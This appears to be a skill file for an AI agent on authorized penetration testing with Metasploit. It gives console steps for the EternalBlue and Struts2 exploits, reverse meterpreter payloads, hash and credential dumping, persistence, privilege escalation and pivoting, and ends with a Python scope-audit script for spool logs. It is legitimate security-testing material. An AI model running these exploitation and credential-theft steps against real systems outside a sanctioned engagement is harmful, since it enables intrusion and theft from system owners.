pentest-metasploit
Penetration testing framework for exploit development, vulnerability validation, and authorized security assessments using Metasploit Framework. Use when: (1) Validating vulnerabilities in authorized security assessments, (2) Demonstrating exploit impact for security research, (3) Testing defensive controls in controlled environments, (4) Conducting authorized penetration tests with proper scoping and authorization, (5) Developing post-exploitation workflows for red team operations.
What this skill does
# Metasploit Framework Penetration Testing

## Overview

Metasploit Framework is the industry-standard platform for penetration testing, vulnerability validation, and exploit development. This skill provides structured workflows for authorized offensive security operations including exploitation, post-exploitation, and payload delivery.

**IMPORTANT**: This skill is for AUTHORIZED security testing only. Always ensure proper authorization, scoping documents, and legal compliance before conducting penetration testing activities.

## Quick Start

Initialize the Metasploit console and verify database connectivity:

```bash
# Start PostgreSQL database (required for workspace management)
sudo systemctl start postgresql

# Initialize Metasploit database
msfdb init

# Launch Metasploit console
msfconsole

# Verify database connection
msf6 > db_status
```

## Core Workflow

### Penetration Testing Workflow

Progress:

[ ] 1. Verify authorization and scope
[ ] 2. Configure workspace and target enumeration
[ ] 3. Identify and select appropriate exploits
[ ] 4. Configure payload and exploit options
[ ] 5. Execute exploitation with proper documentation
[ ] 6. Conduct post-exploitation activities (if authorized)
[ ] 7. Document findings with impact assessment
[ ] 8. Clean up artifacts and sessions

Work through each step systematically. Check off completed items.

### 1. Authorization Verification

**CRITICAL**: Before any testing activities:

- Confirm written authorization from the asset owner
- Review the scope document for in-scope targets
- Verify IP ranges and systems authorized for testing
- Confirm allowed testing windows and blackout periods
- Document the point of contact for emergency escalation

### 2. Workspace Setup

Create an isolated workspace for the engagement:

```bash
msf6 > workspace -a <engagement-name>
msf6 > workspace <engagement-name>
msf6 > db_nmap -sV -sC -O <target-ip-range>
```

Import existing reconnaissance data:

```bash
msf6 > db_import /path/to/nmap-scan.xml
msf6 > hosts
msf6 > services
```

### 3. Exploit Selection

Search for relevant exploits based on enumerated services:

```bash
msf6 > search type:exploit platform:windows <service-name>
msf6 > search cve:<cve-id>
msf6 > search eternalblue
```

Evaluate exploit suitability:

- **Reliability Ranking**: Excellent > Great > Good > Normal > Average
- **Stability**: Check crash potential
- **Target Compatibility**: Verify OS version and architecture
- **Required Credentials**: Determine whether authentication is needed

### 4. Exploit Configuration

Configure the selected exploit module:

```bash
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target-ip>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RPORT 445

# Configure payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_https
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <listener-ip>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 443

# Validate configuration
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
```

### 5. Exploitation Execution

Execute the exploit with logging enabled:

```bash
# Enable logging
msf6 exploit(windows/smb/ms17_010_eternalblue) > spool /path/to/logs/engagement-<date>.log

# Run exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

# Or run as a background job, without auto-interaction
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
```

**Exploitation outcomes**:

- **Session opened**: Successful exploitation; proceed to post-exploitation
- **Exploit failed**: Review target compatibility, try alternative exploits
- **Target not vulnerable**: Document the finding, move to the next target
- **Service crash**: Document the stability issue, attempt service restoration if authorized

### 6. Post-Exploitation (Authorized Activities Only)

Once a session is established, conduct authorized post-exploitation:

```bash
# List active sessions
msf6 > sessions -l

# Interact with session
msf6 > sessions -i <session-id>

# Gather system information
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getprivs

# Check network configuration
meterpreter > ipconfig
meterpreter > route

# Enumerate running processes
meterpreter > ps

# Check security controls
meterpreter > run post/windows/gather/enum_av_excluded
meterpreter > run post/windows/gather/enum_logged_on_users
```

**Common post-exploitation modules**:

- `post/windows/gather/hashdump` - Extract password hashes (requires SYSTEM privileges)
- `post/multi/recon/local_exploit_suggester` - Identify privilege escalation opportunities
- `post/windows/gather/credentials/credential_collector` - Gather stored credentials
- `post/windows/manage/persistence_exe` - Establish persistence (if explicitly authorized)

### 7. Privilege Escalation

If authorized for privilege escalation:

```bash
# Identify escalation vectors
meterpreter > run post/multi/recon/local_exploit_suggester

# Migrate to stable process
meterpreter > ps
meterpreter > migrate <stable-process-pid>

# Attempt privilege escalation
meterpreter > getsystem
meterpreter > getuid
```

Manual privilege escalation workflow:

1. Background the current session: `background`
2. Select an escalation module: `use exploit/windows/local/<escalation-module>`
3. Set the session: `set SESSION <session-id>`
4. Run the exploit: `exploit`

### 8. Lateral Movement

For authorized internal penetration tests:

```bash
# Enumerate network
meterpreter > run post/windows/gather/arp_scanner RHOSTS=<internal-subnet>
meterpreter > run auxiliary/scanner/smb/smb_version

# Pivot through compromised host
meterpreter > run autoroute -s <internal-subnet>/24

# Use compromised host as proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > run -j
```

Configure proxychains for pivoting:

```bash
# Edit /etc/proxychains4.conf
socks4 127.0.0.1 1080

# Run tools through pivot
proxychains nmap -sT -Pn <internal-target>
```

## Security Considerations

### Authorization & Legal Compliance

- **Written Authorization**: Maintain a signed penetration testing agreement
- **Scope Adherence**: Only test explicitly authorized systems and networks
- **Data Protection**: Handle discovered data per the engagement's rules of engagement
- **Incident Response**: Immediately report critical findings per escalation procedures
- **Evidence Handling**: Maintain chain of custody for forensic evidence

### Operational Security

- **Callback Infrastructure**: Use dedicated, authorized callback servers
- **Attribution Prevention**: Avoid personal infrastructure or identifiable indicators
- **Traffic Encryption**: Use encrypted payloads (HTTPS, DNS tunneling)
- **Artifact Cleanup**: Remove exploitation artifacts post-engagement
- **Session Management**: Close sessions cleanly to avoid detection alerts

### Audit Logging

Log all penetration testing activities:

- Timestamp of exploitation attempts
- Source and destination systems
- Exploit modules and payloads used
- Commands executed in sessions
- Data accessed or exfiltrated
- Privilege escalation attempts
- Lateral movement actions

### Compliance

- **PTES**: Penetration Testing Execution Standard compliance
- **OWASP**: Alignment with application security testing methodology
- **MITRE ATT&CK**: Map TTPs to the ATT&CK framework for threat modeling
- **PCI-DSS 11.3**: Penetration testing for payment card environments
- **SOC2**: Security testing for service organization controls

## Common Patterns

### Pattern 1: Web Application Exploitation

```bash
msf6 > use exploit/multi/http/apache_struts2_content_type_ognl
msf6 exploit(...) > set RHOSTS <web-server>
msf6 exploit(...) > set TARGETURI /vulnerable-app
msf6 exploit(...) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 exploit(...) > exploit
```

### Pattern 2: Database Server Exploitation
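The Scope Adherence and Audit Logging requirements above say what the engagement record must prove: which module was run, against which target, when, and with what outcome, and that every target was inside the authorized ranges. The following is an added example, not part of this skill or of Metasploit itself, that reads a console log of the kind produced by the `spool` command and checks each `exploit`, `check` or `run` attempt against the authorized CIDRs. The sample log lines are constructed, and their `[timestamp] prompt > command` layout is an assumption (it presumes the console was configured to timestamp its output); `parse_attempts`, `in_scope` and `summarize` are names chosen here, not Metasploit API.

```python
"""Scope and audit check over a Metasploit console spool log (added example)."""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample spool. The "[timestamp] prompt > command" shape is an
# assumption for this example, not a format taken from a real engagement log.
SAMPLE_SPOOL = """\
[2024-03-05 09:12:01] msf6 > workspace acme-q1
[2024-03-05 09:12:30] msf6 > use exploit/windows/smb/ms17_010_eternalblue
[2024-03-05 09:13:02] msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.20.15
[2024-03-05 09:13:10] msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_https
[2024-03-05 09:13:20] msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.0.2.10
[2024-03-05 09:13:40] msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[2024-03-05 09:13:41] [+] 10.10.20.15:445 - The target is vulnerable.
[2024-03-05 09:14:00] msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[2024-03-05 09:14:22] [*] Meterpreter session 1 opened (192.0.2.10:443 -> 10.10.20.15:49812)
[2024-03-05 09:20:00] msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.99.7
[2024-03-05 09:20:10] msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[2024-03-05 09:20:31] [-] 10.10.99.7:445 - Exploit failed: connection refused
"""

# Console command line: timestamp, prompt (optionally showing the loaded module), command.
CMD_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] msf6(?: (?P<kind>\w+)\((?P<module>[^)]+)\))? > (?P<cmd>.+)$"
)
# Console status line: timestamp, [*]/[+]/[-]/[!] marker, message.
EVENT_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[(?P<level>[*+\-!])\] (?P<msg>.+)$")
SESSION_RE = re.compile(r"session \d+ opened")
ACTIONS = {"exploit", "check", "run"}


@dataclass
class Attempt:
    """One exploit/check/run command, with the module and target in force at the time."""
    timestamp: str
    module: str
    action: str
    target: str
    outcome: str = "unknown"


def parse_attempts(spool: str) -> List[Attempt]:
    """Walk the spool once, tracking the loaded module (from the prompt) and
    RHOSTS (from `set` commands), and emit one Attempt per action command.
    The first status line following an action is recorded as its outcome."""
    attempts: List[Attempt] = []
    rhosts = "(unset)"
    pending: Optional[Attempt] = None
    for line in spool.splitlines():
        cmd_match = CMD_RE.match(line)
        if cmd_match:
            pending = None  # a new command ends outcome capture for the previous one
            module = cmd_match.group("module") or "(none)"
            parts = cmd_match.group("cmd").split()
            if len(parts) >= 3 and parts[0] == "set" and parts[1].upper() == "RHOSTS":
                rhosts = parts[2]
            elif parts and parts[0] in ACTIONS:
                pending = Attempt(cmd_match.group("ts"), module, parts[0], rhosts)
                attempts.append(pending)
            continue
        event = EVENT_RE.match(line)
        if event and pending is not None:
            pending.outcome = event.group("msg")
            pending = None
    return attempts


def in_scope(target: str, authorized: List[str]) -> bool:
    """True when the target (single address or CIDR) lies entirely inside one
    authorized network. Unset or non-IP targets cannot be proven in scope."""
    try:
        tnet = ipaddress.ip_network(target, strict=False)
    except ValueError:
        return False
    return any(
        tnet.version == net.version and tnet.subnet_of(net)
        for net in map(ipaddress.ip_network, authorized)
    )


def summarize(spool: str, authorized: List[str]) -> Dict[str, object]:
    """Audit summary: attempt count, attempts outside scope, sessions opened."""
    attempts = parse_attempts(spool)
    return {
        "attempts": len(attempts),
        "out_of_scope": [a for a in attempts if not in_scope(a.target, authorized)],
        "sessions_opened": sum(1 for line in spool.splitlines() if SESSION_RE.search(line)),
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_SPOOL, ["10.10.20.0/24"])
    print(f"attempts={report['attempts']} sessions_opened={report['sessions_opened']}")
    for a in report["out_of_scope"]:
        print(f"OUT OF SCOPE {a.timestamp} {a.module} {a.action} {a.target}: {a.outcome}")
```

On the constructed sample, the check and the first exploit run against 10.10.20.15 fall inside the authorized /24, while the second exploit run against 10.10.99.7 is flagged, together with the module, timestamp and the console's own failure message, which is the record a report reviewer or an incident responder would need to act on.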
Related in offsec
privesc-linpeas
Linux privilege escalation enumeration and attack surface analysis using LinPEAS (Linux Privilege Escalation Awesome Script). Automates post-exploitation discovery of escalation vectors, misconfigurations, and credential exposure on Linux targets. Use when: (1) Enumerating privilege escalation vectors after initial access on a Linux system, (2) Identifying SUID/SGID binaries, sudo misconfigurations, and capability abuses, (3) Hunting for credentials in config files, history, and logs, (4) Detecting container breakout opportunities and writable service files, (5) Mapping kernel exploits and CVE exposure for a target system, (6) Conducting authorized CTF, red team, or penetration test post-exploitation phases.
analysis-tshark
Network protocol analyzer and packet capture tool for traffic analysis, security investigations, and forensic examination using Wireshark's command-line interface. Use when: (1) Analyzing network traffic for security incidents and malware detection, (2) Capturing and filtering packets for forensic analysis, (3) Extracting credentials and sensitive data from network captures, (4) Investigating network anomalies and attack patterns, (5) Validating encryption and security controls, (6) Performing protocol analysis for vulnerability research.
crack-hashcat
Advanced password recovery and hash cracking tool supporting multiple algorithms and attack modes. Use when: (1) Performing authorized password auditing and security assessments, (2) Recovering passwords from captured hashes in forensic investigations, (3) Testing password policy strength and complexity, (4) Validating encryption implementations, (5) Conducting security research on cryptographic hash functions, (6) Demonstrating password weakness in penetration testing reports.
network-netcat
Network utility for reading and writing data across TCP/UDP connections, port scanning, file transfers, and backdoor communication channels. Use when: (1) Testing network connectivity and port availability, (2) Creating reverse shells and bind shells for authorized penetration testing, (3) Transferring files between systems in restricted environments, (4) Banner grabbing and service enumeration, (5) Establishing covert communication channels, (6) Testing firewall rules and network segmentation.